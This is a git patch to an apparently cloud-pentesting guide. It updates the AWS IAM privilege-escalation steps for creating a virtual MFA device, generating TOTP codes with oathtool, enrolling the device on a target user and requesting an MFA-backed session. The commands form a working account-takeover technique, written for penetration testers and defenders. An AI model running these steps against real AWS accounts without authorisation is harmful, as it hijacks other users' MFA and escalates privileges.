From 3963a1ef8a7ad8809e83eae0f10d543a33d46f43 Mon Sep 17 00:00:00 2001
From: Jacob-Ham <99051071+Jacob-Ham@users.noreply.github.com>
Date: Tue, 26 May 2026 12:54:52 -0500
Subject: [PATCH] Fixed virtual mfa device creation command, add example TOTP
 tool, add command for getting mfa backed session

---
 .../aws-iam-privesc/README.md                 | 29 +++++++++++++++++--
 1 file changed, 26 insertions(+), 3 deletions(-)

diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
index 440ff931e..a35a26db9 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
@@ -57,17 +57,40 @@ aws iam delete-access-key --access-key-id <key_id>
 
 If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials.
 
+**Prerequisites:**
+
+You can use any tool you want for the TOTP codes - oathtool is easy and lightweight.
+
+```bash
+sudo apt install oathtool
+sudo dnf install oathtool
+sudo yum install oathtool
+```
+
 **Exploit:**
 
 ```bash
 # Create a virtual MFA device (this returns the serial and the base32 seed)
-aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>
+aws iam create-virtual-mfa-device --virtual-mfa-device-name <name-the-device> \
+    --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt
 
-# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
-aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
+# Generate 2 consecutive TOTP codes from the seed
+
+oathtool --base32 --totp "<Seed_Here>" -w 1
+
+# Enable the new device for the user
+aws iam enable-mfa-device --user-name <target_user> --serial-number <device-arn> \
   --authentication-code1 <code1> --authentication-code2 <code2>
 ```
 
+**Authenticate:**
+
+Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token.
+
+```bash
+aws sts get-session-token --serial-number <device-arn> --token-code <code>
+```
+
 **Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions).
 
 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**